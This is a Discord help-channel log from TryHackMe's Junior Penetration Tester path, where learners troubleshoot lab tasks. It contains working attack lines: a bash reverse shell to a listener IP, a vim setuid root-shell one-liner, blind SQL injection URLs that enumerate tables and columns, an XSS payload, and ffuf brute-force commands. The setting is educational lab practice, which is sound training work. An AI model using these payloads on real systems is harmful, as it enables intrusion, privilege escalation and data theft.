#junior-pentester-path

You only have to call the filename of the file you uploaded.

ohh ok, got it to work like you said, prob sumthin weird happened

Hi everyone, i'm having a problem in tryhackme and i hope some of you can help me. When i start the AttackBox, every five seconds it says me "Disconnected" and i can't do anything. Can someone explain to me how to solve this?
Thank you so much for the answer

Have you checked that there is no issue with your ISP?

yes. i use a VPN but that's not a problem i suppose. I don't think i have any problems

I've also tried to disconnect myself from the VPN but nothing has changed. It keeps saying me "Disconnected"

been stuck on this file inclusion challenge fora bit. Anyone able to give me a hand?

Hi,
currently I´m doing the jr. pentester path and I just solved the Authentication Bypass Room.
I need and explaination of Task 4: Logic Flaw.
I understand the logic behind the method and how it´s been executed, but I do not really get how to find out,
if the application is using the $_Request variable. Thats the vulnerability, right?
Can someone explain me how I can figure that out?

check for the dot(s), it is very essential to find the exact entry point (trial and error). each .. moves one directory until it reaches root directory.

To add to what @clever cloud said, usually, the root of your website would be located on /var/www/html so you would have to move from that path to the /etc/ where the flag is located.

Oh so it is trial and error? I thought I was doing stuff wrong ahah guess I’ll try it

In a way, yes.

Hello, im currently at Linux Privilege Escalation by task 9 and I want to establish a reverseshell.
My crontab file looks like in the screen shot.
So I edited the /home/karen/backup.sh file with the following content:
#!/bin/bash
bash -i >& /dev/tcp/10.14.59.178/4444 0>&1
And a Netcat listner in my attcking maschine on port 4444.
But I didn't even see packets send to me via tcpdump.
What am I doing wrong? 😦

Can you ls -la on backup.sh?

sounds like you forgot the execute bit on the script.... check with ls -lah
where:
ls == list
-l == long format meaning it shows permissions
-a == meaning show all files even hidden files and the current dir . and parent .. dirs
-h == display sizes of files in human readable format

I'm on the Linux Privilege Escalation room in the Jr Pen Tester path and I cannot seem to get the cronjob reverse shell to work in task 9. I'm updating the backup.sh file to include the line bash -i >& /dev/tcp/[MY IP]/6666 0>&1 and using nc -nlvp 6666 as a listener

ls -lah backup.sh then post the results here and maybe figure out what the problem is on your own or ask.... || it is the execute bit missing on the script||

I've made it an executable. Is it just a matter of waiting for the cronjob to run?

chmod +x backup.sh???? and after that yes it should be just wait for it to run

Yeah, it's still not called back to my listener

is the backup.sh in the right location???

I've not moved it

it's still where the crontab thinks it is

https://revshells.com

try some other payload from here and see if that works

like the python ones

Gonne check that one, thank you! 🙂
Edit: Hahahaha that did the trick, stupid me.
Thank you very much!

Gave +1 Rep to @sage current

hi everyone, I'm on task 5 of content discovery, but my attackbox cannot open it says exceed limit for 1 hour a day. is there any way to complete this task?

i could manage to complete task 3 because it provides the prompt to copy and run on windows powershell. but on task 5 only got for curl

If you have the resources you can use a vm

need to have external vm?

vm such as virtualbox is it?

Virtualbox is a hypervisor, you can use it to run Linux and stuff.

hey

guys who

can tell me why i can't download this

(Linux Privilege Escalation Room TASK 5)

it look like a privilege issue
did you give it all the permission ?

how can give it all the permisonon?

permission*

chmod 777 exploit

i gave her

i think tthe problem is the wget

not in the file

it look like there are already an exploit on the second machine

and you can't download your new exploit cause you can't overwrite the one already existing

i have changed the name

and still dosen't work

try wget -S ...
it should give more information about the issue

same

wait imma try it

i have installet it in the target macchine

but when i run it i got this "./ofs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ofs)"

yhea, the exploit and the machine use different version of GLIBC

yess

nvm ude

dude i solve it

Anyone else having a problem with the sql injection machine where it keeps breaking?

super annoying

Which room are you working on?

introduction to web hacking

the SQL injection room

finally got through it though. just know that you may have to restart the machine a couple times

anyone able to help me with flag 2 on the file inclusion lab?

i changed the cookies guest value to /etc/flag2

hullo?

Task No ?

Challenge 2

Capture Flag2 at /etc/flag2

File Inclusion

hey have u managed to find it?

Yeah, I had solved this lab long back, let me check.

Task 8

Capture Flag2 at /etc/flag2

oops my discord didnt update and i got ur first ping again

mb for repeat

you still there? 😅

im on task 6 of subdomain enumeration. im running the commands and they dont seem to be producing a result

nvm it worked now

anyone able to help me wiuth the File Inclusion Lab? Task 8
Capture Flag2 at /etc/flag2

The value is still not correct. In your pic you're not changing directories and it fails because the /etc/flag2 isn't in the current directory

what do you mean?

because before i changed it it told me only admins could visit

You changed it to what?

I mean the error says that the file /etc/flag2 isn't in the directory /var/www

So right now you're in the /var/www/html directory and the /etc is in the root directory

im just trying to traverse the directories to find the webpage but cant

You have to go back more directories. Right now you're in the /var/www/html/chall2.php, so to go to the root directory from there you just have to count

aye yeah i added a few more ../ and i managed to find the flag

thanks

is this correct for the file inclusion lab task 8 challenge 3?

can someone help me whit the task 8 in Linux Privilege Escalation, i keep getting this error:

Error detected while processing command line:
Traceback (most recent call last):
  File "<string>", line 1, in <module>
PermissionError: [Errno 1] Operation not permitted

Is this about overwrite.sh?

SMTP room

how to solve this?

no it's about using VIM to open a root shell

What is the exact command you are running?

What's wrong with this can someone please help me with this.?
Level Four:
Entering your name into the form, you'll see it reflected on the page. This level looks similar to level one, but upon inspecting the page source, you'll see your name gets reflected in some JavaScript code.

You'll have to escape the existing JavaScript command, so you're able to run your code; you can do this with the following payload ';alert('THM');// which you'll see from the below screenshot will execute your code. The ' closes the field specifying the name, then ; signifies the end of the current command, and the // at the end makes anything after it a comment rather than executable code.

Now when you click the enter button, you'll get an alert popup with the string THM. And then, you'll get a confirmation message that your payload was successful with a link to the next level.

<script>
document.getElementsByClassName ('name')[0].innerHTML = ''; alert('THM'); //';
</script>

can someone please help me on above task.?

Can you share what room is this?

did the burp room got updated?

Yes, there was an email announcement that they will update it.

Are they live?

Not yet (updated my earlier comment as well).

did you try ';alert('THM');//?

its about junior pen-testing path and
Cross-site Scripting room task

yes i did still its saying payload not passed

can u show a screenshot?

i just finished that room

that part was just copy and pasting

<script>
document.getElementsByClassName('name')[0].innerHTML='';alert('THM');//';
</script>

this is what i paste in input

nah

u put ';alert('THM');//

inside that textbox

hi guys ,
i have been strugling with the web hacking section, i find myself to be really bad at web application penetration testing but good at network pen testing . is that normal ? i passed the network security modules easily as i have a better Technical background in networking in general. also i am starting to feel kinda web app hacking boring lol. does anyone feel the same way ? can someone help ?

fyi i am now in the ssrf module

@zinc hull thanks rich for helping out, why its works and that snip command shown in challenge not working

Gave +1 Rep to @zinc hull

Yea np, a few bits on that room don’t work lmk if u have any trouble with rest of it

Well being new to hacking myself also it is quite hard at the start but I think THM is good at hand holding you@through the process. I’ve not tried the networking security yet so can’t comment on that. The ssrf section is quite easy if I remember correctly it’s just following instructions

./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

I tried running the commands suggested by gtfobins as well

You should update ./vim to reflect the path of the binary in your target. For instance, if it says /usr/bin/vim, then you should update your command to /usr/bin/vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

can anyone help me with this problem in brute force attack please

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.120.251/customers/login -fc 200

please help me with this command

while using to scan the ffuf command im not able to get the suitable username.

it was authetication bypass module part 3 please solve this my dear hackers

@whole sandal What error is it showing you

hey so I am doing the sqli lab. Im on the time based section. I am trying to find out if there is any table named users or usernames or something like that. But I've gone through the entire alphabet and 0-9 and ive not got any delays for any table names. Is this the correct syntax?
https://website.thm/analytics?referrer=tryhackme.com/admin123' UNION SELECT SLEEP(2),2 where database() like 'sqli_four%' AND table_name like 'z%';--

TABLE_NAME LIKE '%' doesnt return a delay either so im not sure if this is evne the right approach

@zinc hull When you say you tried 0-9, can you show me an example

'0%'

'7%'

did you try selecting more columns

SLEEP(2),2,3

SLEEP(2),2,3,4

the task says there is only 2

Ah

@modest arch I'm not getting valid username and password

any ideas why there isnt a delay for when searching for the table name. It causes delay for the database() like 'sqli' bit

Im a noob so idk but maybe tables are in the information_schema.tables

or information_schema.columns, idk

ah rip

Did you do the prior task of the room ( I assume it is Authentication Bypass)? It should give you the list of valid usernames to include in your list.

@prisma raptor yeah I got 4 usernames

Do you have whatsapp

I will send you a pic the error

Can you verify your account so you can send screenshots here?

!docs verify

anyone able to help me on sli time based as to why i cannot find any tables inside the sqli_four database?

https://website.thm/analytics?referrer=tryhackme.com/admin123' UNION SELECT SLEEP(2),2 where database() = 'sqli_four' and table_name like 'u%';-

Did you try the information_schema

i tried some stuff but maybe i did it wrong or the website was glitched

could you give me an example url

It’s in the previous tasks

like this:
admin123' UNION SELECT 1,2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='users' and COLUMN_NAME like 'a%';

?

Idk just experiment

yeah it didnt work

i think its the same thing i tried before

Which room?

SQLI room

Task 8

Blind SQLi Time Based

You got the link?

https://tryhackme.com/room/sqlinjectionlm

Try this

admin123' UNION SELECT SLEEP(5),2 from users where username like ‘admin’ and password like ‘4961’;

request in 0.001 second so no delay

dont i first need to figure out the users table though?

so i can then brute force the username?

I forgot part of the code.

ik how to do this end part but im not sure how to get the table names

because i cant find a table called username when i was searching

is that in the earlier labs where it shows you? because in this task its a blind sqli where i only get a timer for how long the request took

i think thats from task 5

in band sqli

Yeah I get what you mean, i think youre gonna have to do some googling if you want to get good at blind sqli

Btw in pen testing you would try the table “users” instantly without trying to check if it exists

Because its very possible that it does

yeah i thought that do but when i tried it (if i did it correct idk) it didnt return anything. I even tried a wildcard where it returns if any table is present and nothing got returned.
/admin123' UNION SELECT SLEEP(2),2 where database() = 'sqli_four' and table_name like '%';--

well "nothing got returned" there was no sleep enabled meaning that nothing was found

I dont know if table_name is in database()

I remember that table_name was always in information_schema.tables

Try looking up a writeup

Does anyone know if the burp suite module updates are live?

Not yet.

i found a way to make it work but i also found another table called ''errers'?? is this some kind of easteregg i found? not sure what purpose or what errors means?
https://website.thm/analytics?referrer=tryhackme.com/admin123' UNION SELECT SLEEP(2), table_name FROM information_schema.tables WHERE table_schema='sqli_four' AND table_name LIKE '%errers%';--

also found users

Idk but good job 💪🏽 👍

maybe thats where they hold their passwords because i couldnt find anything for pass,passwords etc

but then theres only 2 collumns so idk how i found 3

also just found 'rers' surely this is some kind of error on my half where im finding these nonsensical tables

i heard certain websites such honeypots to distract devs is this one of them? but then again this is an jr pen tester course idk why they would try make it more difficult

o it could actually be part of a bigger word since thats how i think this %% works since i found errers and then rerrs

this is like playing some kind of wordgame lol

Probably referrers

for different web pages?

keep finding many different ones

oh the word refferers

yeah but you're pretty much wasting time here

i found another one for tics

i need to know what table the passwords are kept i think

if you completed the task then you're wasting time

nah i need a username and password

if you want the whole database then lookup SQLMap

oh you didnt get the flag yet

its a blind sqli though idk if that would work

yeah not yet

i need to find what table the passwords are kept

found the users table

now im finding tables like rers errers etc

and now tics

ah that was analytics

this is so goofy isnt there a way to look at all the different pages without doing this brute force?

surely im doing something wrong here

theres no way theres a real word in there

especially not for passwords

analytics&referrers maybe.

idk why you spending time on this

search for different table already

i am lol

i keep getting different weird stuff

table_name LIKE '_sers%'

begining with a _

ah i see

the _ is a wildcard too bro

😂

wym

but this one _

is a wildcard for 1 character

for example

if you wrote Rix%

it would return Rixon

but Ri_on

would also work

% and _ are wildcards

ah well i cant enter anything unfortunatly 😂

so if you have a table like users

you can check if its the end of the word

using users_

aah yeah sers is users

yep

but yeah the _ makes sense as well

wtf did they call the passwords table omfggg

surely its not analytics

users

maybe inside users

could be the passwords column

u can do that?

shesh

bro users is the table

not the column

table can have passwords

once you got the table

you do FROM users WHERE column_name

or something like that

or FROM users WHERE password LIKE "a%

that does kinda explain how im only able to find users and analytics

actually you get the column name by going thru information_schema.columns

@zinc hull

admin123' UNION SELECT SLEEP(3),2 FROM information_schema.columns WHERE table_name LIKE 'users' AND column_name LIKE '%

and look for the column you need

once you got the column name, its easy

ah thats what i was trying to do just now lol

thanks

np

my attempt didnt work ahaha

UNION SELECT 1,2,3,4 from users where username like '%'

I just got the password

It's always fun to go back and see if I still remember how to do it

(I didn't remember sh** lol)

ah nice

unfortunatly my machine crashed

so now i need to do all the tasks again

🤣🤣🤣 DAMN

https://tenor.com/view/crying-crying-meme-gif-26327776

practice makes perfect 😂

ive been taking notes throughout this jr pen testing thing tho so i got all the info stored

hey do I need to specify the path ie: users -> username?
https://website.thm/analytics?referrer=tryhackme.com/https://website.thm/analytics?referrer=tryhackme.com/admin123' UNION SELECT 1,2 from users where username like 'a%

Hey guys I’m doing this path and almost finished it, today I saw that my burp suit module has reseted… does anyone has the same issue? I checked and looks some material changed… doesn’t make sense to have to go through it again though! 😱

My burp module has reset as well. Hopefully they restore my progress

ok so its not normal that they reset already done content? ^^ was wondering also.

There was an email about it that says it will be updated to align with the current burp version.

Sadly, I don't think your progress can be reset to reflect the status before the refresh as it is a 'new' module.

Lol, more progress lost...

I guess you could say that, but it is better as opposed to THM having outdated content.

Did you solve it

Ye

Thanks anyway for help

is the website down

guys ?

seems ok to me

Works for me as well.

o

ok

Oh didn’t see that email… anyway always good to have new material! 💪🏻 thanks for the reply

Gave +1 Rep to @prisma raptor

I went back through all the burp modules yesterday, and they are all gone again today

You meant you completed the refreshed modules, right? If that is so, you might want to check or submit a ticket with THM Support.

Hello Everyone, I'm new here.

I do not have enough knowledge about Cyber ​​Security. I just started and I want to improve myself.

If you are new then I wouldn’t recommend starting at the junior pen tester path

Start with something like intro to cyber

got stuck in task 7. anyone can help me under ( burpsuiterepeater)

they updated some if im not wrong i finished too , and i assume u have badge too .
in my opinion not bad to go thro it again real quick it will take u like 30 min max since u did it before more practice on burp for u

start here : https://discord.com/channels/521382216299839518/974406074444685322 + https://discord.com/channels/521382216299839518/878341649829330994

I went back through last night and finished almost everything from memory in just a few minutes. The only ones left are the ones with the flags. I'll do those soon.

ye , i did same alos flags are good to refresh ur practices and memory too . i recognized that i got the flags maybe 60% faster then first time because u know how to work with burp suite more . good luck 🤞

@valid basin 3rd times a charm

been trying the metasploit room for exploiting and ive been trying to find vulnerabilities on a ip address. Can anyone tell me whgat im doing wrong

i ran msfdb init before like on the prev lab

Did you run msfconsole?

i did but upon running the msfdb init i think it escaped the metasploit

so i managed to fix it now by running it again forgot to say

On the metasploit Exploit Lab it says
"Exploit one of the critical vulnerabilities on the target VM"
And on a hint it says: The target is missing the MS17-010 patch.
upon running db_nmap -sV -p- 10.10.231.251
I have not been able to identify this? Could somebody tell me how I would've known this without the hint?

maybe this has something to do with why it doesnt show why its not giving me the vulnerability?

when i tried to run the ms17 exploit it told me it was unreachable even though the hint literally said it should be

Aside from the command you just ran, I usually run another nmap scan with the -A option that includes OS detection, Service Version Scan, and the default nmap scripts. Once you have the OS version, you could Google possible exploits in it.

Another nmap scan would be running the --script=vuln, which will show you a list of exploits or vulnerabilities you can exploit on thr target.

That's what I do, but there are other ways for sure.

For metasploit, you have to give it some info such as the payload, the machine IP, target, etc.

Once you have selected your exploit, you can type show options and metasploit will identify what info, especially where required, you need to supply for the exploit to run correctly.

would you know whats going on?

it says starting but nothing happens

if i press the down arrow it does what happened above

Add -A to the nmap command and -v

ah yea

but what does this actually mean since apparently the ip is vulnerable to ms17 but where would it say that

This is metasploit right?

yea

To avoid confusion, you run nmap via the terminal (let's call it terminal 1) and you run metasploit in a different terminal (terminal 2).

ah ok

You run nmap to enumerate your target, meaning you want to know what ports are open and the services that are running on those ports in the target.

In the case of metasploit, it is a suite of tools that you can use to enumerate and exploit a vulnerability to gain access in your target.

Note: I probably am not doing justice in defining and/or describing the capabilities of metasploit, but I'm trying to simplify it as much as I can. You can build on it later as you see fit once you have a basic grasp of things.

ah i see, i just need to find the different commands that help me with finding vulnerabilities

Yes all in 1 for exploit

i find it a bit difficult to read that as to what it means and how it apparently proves that there is a ms17 vulnerability

https://www.stationx.net/nmap-cheat-sheet/ search on the internet, you find many cheat sheet to help you

i see but could you help me with understanding the output?

drop the result of the scan

^

do you have check port signification ? 🙂

sorry what is that

have you checked the port signature (sorry my english is not perfect)

i dont know what it is how do I check that

I guess you could take a step back and read on what the steps of penetration testing are. Knowing the tools to run without really knowing why isn't really helping you.

i understand the steps but i dont know what the contents of the nmap output mean

there are open ports

but im not sure how it is showing there is a ms17 vuln

The nmap scan is still running.

damn it says 0:40:32 remaining

This will take time as you have the -p- with the -A option in your command. Thus, nmap will do all those checks against all the ports

What you can do is break down the scan into stages. For example I run the -p- first to get a list of open ports. Once I have the list, I run another nmap scan with the -A option against those identified open ports. Thus, the detailed checks will be done only against those ports I specified.

ah i see

so i have these open ports:[] Nmap: Discovered open port 139/tcp on 10.10.227.136
[] Nmap: Discovered open port 445/tcp on 10.10.227.136
[] Nmap: Discovered open port 135/tcp on 10.10.227.136
[] Nmap: Discovered open port 3389/tcp on 10.10.227.136

3389 is probably just me i think right since thats the port for remote desktop

so i need to run a scan using the -A on those ports

Yes

so exploit that port 135 thats open?

the hint on this task says that the vulnerability is to do with "The target is missing the MS17-010 patch." but i cannot find anything about it in any of these scans

ive exploited it but honestly no idea where it showed that vulnerability existed

You may or may not know it based on the results of the nmap scan alone. This is where you Google-fu skills will come in.

Did you do this after discovering the open ports? @zinc hull

Also, I noticed that you still ran your nmap command in metasploit.

Hello everyone
I'm in "Burp Suite: Other Modules"
→"Task 8 Sequencer: Live Capture"
I don't know the answer for the question.
I did the necessary analysis, but have no idea about the correct answer.
I will attach my result.

I found the answer.
Thanks.

Hi, sorry to bother you all. I have some issues with subdomain enumeration task6. I got an error that keyword FUZZ is defined but not found in headers, method, URL, or Post data. Do you have any ideas what i am doing wrong?

Can you post your exact command?

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/name list.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.x.x

As state in the task, FUZZ in place where subdomain should be

To confirm, do you have the wordlist saved in the same location or directory where you are running the command from?

Nope, but don't know where to looking for wordlist

Do you know?

Are you doing the task in the Attackbox or in your kali VM?

If in your kali VM, you can download the entire SecLists repo by running git clone https://github.com/danielmiessler/SecLists.git

What if i am using AttackBox, as there i got plenty of errors?

I will try it tomorrow, thank you very much 🙂

Gave +1 Rep to @prisma raptor

this shoud be fine as long as the name list.txt doesnt space (namelist.txt) once it run there should be an output status 200 and look for the smallest size and that's exactly the subdomain.

There is no space when i am using it, miss click 🙂

may i see the sample output ?

likethis [Status: 200, Size: 2395, Words: 503, Lines: 52]

Encountered error(s): 1 errors occured.
* stat /usr/share/wordlists/SecLists/Discovery/DNS/namelists.txt: no such file or directory

Are you working on the Attackbox?

I will check the solution provided by @prisma raptor tomorrow

yep

but using Open VPN and VM I have the same results

try to locate first

locate namelist (output like this /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt) should be. i am using attackbox too

I think it is all about this FUZZ word, will check and send you the outcome 🙂

as it probably will be missing file with SecList so it cannot find anything

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "host: FUZZ.acmeitsupport.thm" -u http://10.10.X.X works on me. tried to open

try this. locate namelist

so it cleary shows that it is a porblem with mine machine 🙂

root@ip-1XXXXXX~# locate namelist
/opt/metasploit-framework/embedded/framework/data/wordlists/namelist.txt
/usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt

/opt/metasploit-framework/embedded/framework/data/wordlists/namelist.txt
/usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt

probably . you may like to terminate and start .the machine. else , someone will help you

Encountered error(s): 1 errors occured.
* stat /usr/share/wordlists/SecLists/Discovery/DNS/namelists.txt: no such file or directory

when I tried full commend

but there is extra s, hold on

manually go to the directory

cd /usr/share/wordlists/SecLists/Discovery/DNS

then ls. look if there is no file

if you're using VPN/VM and your VM is kali, try ../seclists/... instead of .../SecLists/...

by default that folder is lower case

yeah nowadays

on older versions it was the camel case

what should be the size used to filter?

i have 472

it depends but look for the lowest .

i have too many results after first command and cannot scroll up to the start, all results I can see are 472 in size

can you look on [Status: 200, Size: 56, Words: 8, Lines: 1] (maybe different on mine)

different results but again, I cannot scroll all results so I am not able to find correct answers. Let's leave it till tomorrow, I am tired now 😄

:-). ur luck is look for the ffuf github then manually create script to include output file to .txt or json.

I am not feel confident enough to write scripts yet but will think about it 😄

dont forget to verify your discord account and dm TryHackMe(bot) Usage: !verify <token>
Get your token from https://tryhackme.com/profile.

Hello All, Iam preparing for the sec542 (GWAPT). Any recommendations for what rooms to solve for polishing web app pentesting skills?

Not really THM, but have you looked at https://portswigger.net/web-security?

i did the jr pentest path last year, then just finished google cybersec cert this week.
Just bought access and voucher for eJPT. After getting through the first course in eJPT i honestly feel like it was a waste of money and the TryHackMe jr pentest was filled with way more information presented in a much more useful and practical aspect....
Ultimately my goal is to get the OSCP cert, and maybe i should have just skipped over the eJPT? Maybe there will be more info that i'm missing but....feeling like TryHackMe covers everything much better at this point. Feels like i wasted $300 lmao

the lab didnt even have questions to answer, it was just "do this" and then "view solution". Felt very...disconnected.

Anyone else here do the eJPT?

hi, i'didn't make the eJPT , nut i know thaht is a good certification for job. in this moment i am doing a JR penterster in THM and i think that is lot utility for the eJPT ( also because don't cost 300 dolars ahha) . But after read your message i have alot of dubs.

ecsuse me for my bad english

By dubs do you mean, confidence? or doubt? The THM Jr Pentest path is VERY good in my opinion. It seems in the US, eJPT is not as great for jobs, and most employers want OSCP here instead. eJPT is reccommended, but i think many people do not know about THM until recently.

hi, i'm newbie and i'm beginning to learn and into webapplication path learn, i must to connect with attack box, until here all its good. But when i want to connect on the web url, not response, same with youtube.com for test.. someone can help me? Thx

To clarify, are you using the Attackbox? If so, you need to put in the URL in the browser within the Attackbox.

justly i make it but dont response

All I'm saying is that it makes me strange that a 300-dollar course is not effective and instead a normal site where you pay much less is more complete.

It was strange to me too. I think eJPT's website has great stuff, but the way some of the material was presented was not great. TryHackMe also has a huge community backing. From my experience, open source content is usually better maintained. I dont wan't to call eJPT bad, just...i am definitely more impressed with TryHackMe and like the content presentation better.
I felt disappointed paying $300 for eJPT and would rather study majority through TryHackMe and other resources like TCM, HTB, and overthewire to prepare for OSCP. TryHackMe is good.

hello, i'm i welcome here

Hello and welcome!

Hi, I want a little help what path should I take after finishing jr Pentester path ?

#general message

Thank you so much 🎯

Gave +1 Rep to @prisma raptor

I can't compile the 37292 .c file which is needed for kernel exploitation. I am getting this error:

37292.c: In function ‘main’:
37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration]
106 | if(unshare(CLONE_NEWUSER) != 0)
| ^~~~~~~
37292.c:111:17: warning: implicit declaration of function ‘clone’; did you mean ‘close’? [-Wimplicit-function-declaration]
111 | clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
| ^~~~~
| close
37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]
117 | waitpid(pid, &status, 0);
| ^~~~~~~
37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
127 | wait(NULL);
| ^~~~

These lines are not cut.

Can anyone help me?

This is needed for Linux priv escalation.

Which box are you working on?

Have you checked if there is a gcc installed on the mahine? Including what version?

working on "Linux privilege escalation" Module.

Where did you compile your exploit?

If you did it in your kali VM, chances are you'll have version compatibility issues.

Have you tried it on your victim machine?

No. I haven't.

I can get the access through SSH. But can't get to compile there

Hmm.. is that the exploit as instructed in the room?

yes

i just did that room yesterday. if you do an ls while connected to ssh. you’ll find that the file is already there. So then just follow the room guide from there. The green text.

Anyone having problems with "what the shell room ?" ?

I'm trying to upload a webshell.php but when i type out that long shell command nothing happens on my listener i type the shell command after cmd:http://address/uploads/webshell.php?cmd= "that long shell command"

I did Change the ip and the port to catch up the connection on my listener but without useful result

i have been having this problem all day too !

Actually this is done by another way. I transferred the shell and compile it.

It's really annoying man, wasting your time because of a tiny bug

i think that we should try other kind's of shell's other than PHP

I checked the internet and I only saw the basic php reverse shell to solve this task

@wild cave
Let me know if you can find anything useful. I sent the problem to #room-bugs

sure, pls tell me if it's really a bug

i have been on this for hours

I will brother.

thanks

Gave +1 Rep to @hot void

hey as long as you were able to get past that. More power to you.

As a TryHackMe fan, I'm disappointed with the Burp Suite module released two weeks ago. It's just painful to go through it. I finished the room Burp Suite: The Basics and started Burp Suite: Repeater. Burp Suite has a lot of functions, I know. The problem is that the room explains what EACH button does theoretically and in a way that is both boring and overwhelming at the same time. I say this as a person that loved almost every TryHackMe room.

@wild cave
You were right we have to use another webshell

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

Use this shell and change the ip and the port at the end

i think that is very tedious that for an updateof the room i lost my progress and and I have to do them all over again .

Yep.

wsg guys

thanks man it worked !

Gave +1 Rep to @hot void

i am at the "Walking an application " room and i have tried to find the flag and was able to find flag on the secret link and on the HTML page but i don't know how to find the remaining flag{directory listing , framework }flag and i don't have knowledge of reading the source code , any suggestions?

Have you read the contents of the room? As it should point out how to get the flags (using only the browser).

yeah but in the source code i couldn't find the it

I finished that one just yesterday. If you’re looking at the source. It’s a comment on the bottom you’re looking for. I believe. I’m just going off the top of my head.

It's not a flag, it's a link.

g

🙂

I’m doing the net-sec challenge room and my hydra doesn’t seem like it’s ever connecting. It shouldn’t take HOURS to run, should it? I’ve done -fdv to see what’s going on, but my hydra never actually finishes running. I don’t think this could be correct.

I’ve only managed to remember to extend my box by one hour once. But I can’t imagine it should take this long.

Uhhhh ok I cheated and looked at a walkthrough. This isn’t exactly too much of a hint to say to anyone having this problem — confine yourself just to using hydra on the specific open ports! That was my problem.

You mean you were attacking closed ports too? 😅

What the shell ?
The remote windows target doesn't have netcat nor socat installed

And i can't access the internet from the Windows server

Have you tried nc.exe or netcat.exe?

Also, from the text, I think part of the challenge is to transfer a socat static binary on the target.

Thank you, i found the nc.exe

Gave +1 Rep to @prisma raptor

I just did the entire machine unthinkingly! Lesson hopefully learned.

Does anyone here having an issue in practice section > Series Tab > Nmap. I can't ping target machine from both local kali, and Attack Box/OpenVpn

Btw; next time you can -v (verbose) too with Hydra. It will show you each combination it used, so if it's not running you will see it that way for sure.

Thanks!

In What the Shell room The ip address for the Linux box doesn’t lead me to an Linux upload box. It fails to load. Any advice on this?

Neither is it pinging.

What is the syntax you type in the browser?

“http://IP Address”

Did you add the domain at the /etc/hosts file ?

Aah no I didn’t. Such a fool. Thanks.

Gave +1 Rep to @hot void

You are welcome.

Does anyone know of any videos that explain the LFI room well? I mostly understand it and ive done the first two challenges but Im stuck on the third.

@vapid jackal what is the question?

https://medium.com/@wiktorderda/file-inclusion-tryhackme-walkthrough-123b0103602f

This looks like it will help a lot thank you.

Gave +1 Rep to @tribal vessel

no problem 🙂

im almost done with the Web Fundermentals myself

i think i had trouble wrapping myhead around the LFI section too

the nullbyte confused me abit

You'll learn that it's a lot of trial and error. You don't have to learn everything by heart but just the different possibilities! :)

yeh i using cherrytreee for note taking

making it so much better

What is the PATH variable in privilege escalation and how does it work? Any simple explanation?

I would describe the PATH environment variable as the location or directory the OS would look for when executing a specific binary or program.

With that said, have you ever wondered why there are programs that you simply put in the name to run, such as cat, ssh, rm, etc. That is because the location of these binaries are saved in the PATH environment variable. In contrast, there are programs that when installed, you have to indicate the full or relative path in order to run those. That is because the location or directory where you saved or installed those may not be included in the PATH environment variable.

Now, in privilege escalation, if we can somehow trick the OS to pick our malicious program / binary by prepending the PATH environment variable with the location of our malicious program, we can get the OS to execute the contents of our program / binary.

For example, the legitimate binary is located in /usr/bin and our malicious binary is in /tmp, by putting /tmp before /usr/bin in the PATH environment variable, chances are the OS will pick and execute our malicious binary instead of the legitimate one.

Thank you. Nice explanation!

Gave +1 Rep to @prisma raptor

Glad I could help.

does anyone know how to stop the screen from being blank

vm

Have you tried to connect to the Attackbox via ssh (since its only showing a white or blank screen)?

no

try to extended the screen

that worked than you so much

anyone able to help me with the burpsuite room

cant seem to find a unusual endpooint

Keep browsing.

i clicked on all of them i think

Keep clicking.

theres not really any links left to click on

I know, but I had to keep browsing, and it eventually appeared

what will it look lkike because all of those look quite unusual to me tbh

5 min(s)

it starts with a 5.

not seeing it :I

Like I said, you need to click around the website

And it will appear here.

i think i clicked on every link on the homepage about 10 times now and this all i got 💀

What about other pages?

i think it tells u to look on click on all the pages on the home page but ill try them as well

god damn this is so goofy i cant find any unusual url surely this isnt the right way of doing it.

Im clicking on all the links on a page
going on burp and then forwarding them on the proxy
Then reading the target sitemap

hey man. so, i remember that you must launch an exploit tath change the number of page.

devi nuemerare le pagine da 1 a 100 e troverai mi pare 4 o 5 pagine . in uan di queste pagine trovi la flag.

ops i copied the wrong text ahahahahaha

you have to nuemerate pages 1 to 100 and you will find I think 4 or 5 pages. on one of these pages you will find the flag.

example: http:// 10.10.x.x/about/1 ,2 ,3 ,5,6,7,9,8 eccc. eccc. this is done with an exploit generated by the INTRUDER section. a numerical payload that you set the number range. in this case you set the payload from 1 to 100.

@zinc hull aye listen man

Just go to staff members profile in that room

I got there

And I completed yesterday

Bruh it's too easy, it ain't this hard

Yes, but the tip also tells you what to do,w

I've been so confused with trying to figure out File Inclusion Task 8, Flag1. I first tried using the built in Firefox dev tools, changing the request to post, adding the needed header, and then sending a post request to get the file, that didn't work. Now i've been trying to use Curl, this is my command, how far off am I lol.

I don't even seem to get an error, the site just looks the same

anyone pls let me know the Karren password to execute the commands Linux Privilege Escalation room
while i try to execute the TASK 3 commands its asking for the password

The command i executed sudo -l

sudo -l
The target system may be configured to allow users to run some (or all) commands with root privileges. The sudo -l command can be used to list all commands your user can run using sudo.

Isn't it in one of the tasks?

Edit: Checked it just now and it says what the password is on Task 3.

hi everyone, in the sql injection room under in-band SQLi we are introducted to the UNION SELECT 1,2,... such that the SLQ statement is:
select * from article where id = 0 UNION SELECT 1,2,3
I understand what the first part which is searching for the article with id=0
But the second part where we are enumerating how many colums there are by using SELECT 1 then SELECT 1,2 etc until we don't get an error. How does this work? Don't we have to SELECT [something] from [somewhere]?

